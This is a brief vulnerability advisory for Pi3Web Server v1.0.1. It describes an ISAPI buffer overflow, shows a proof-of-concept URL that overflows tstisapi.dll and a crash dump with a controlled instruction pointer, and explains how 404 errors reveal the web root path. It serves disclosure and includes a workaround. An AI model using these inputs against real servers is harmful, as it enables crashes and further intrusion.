|
Vulnerability Pi3Web Server Affected Pi3Web Server v1.0.1 Description Joe Testa found following. Pi3Web v1.0.1 is a web server. A vulnerability exists in the server's internal ISAPI handling procedures which results in a buffer overflow. The server also reveals the physical path of the web root upon encountering a 404 error. Here is an example URL that overflows a buffer in Pi3Web's executable: http://localhost/isapi/tstisapi.dll?[a lot of 'A's] This results in the following crash: ENHPI3 caused an invalid page fault in module <unknown> at 0000:41414141. Registers: EAX=00000001 CS=017f EIP=41414141 EFLGS=00010206 EBX=0123d1b0 SS=0187 ESP=041df3b0 EBP=041dfed4 ECX=00000000 DS=0187 ESI=041df3f0 FS=3e6f EDX=00000000 ES=0187 EDI=00000000 GS=0000 Bytes at CS:EIP: Stack dump: 41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141 00bb0b2c 00000000 05611030 To discover the physical path of the web root: http://localhost/[any string which causes a 404 error] The server responds with: The original URL path was: /sadfasdf The mapped physical path was: C:\PI3WEB\WebRoot\sadfasdf Solution The buffer overflow can be prevented by deleting the ISAPI module named 'tstisapi.dll'. There is no quick solution for the web root disclosure. The author, John Roy, was contacted on February 5, 2001. No reply was received.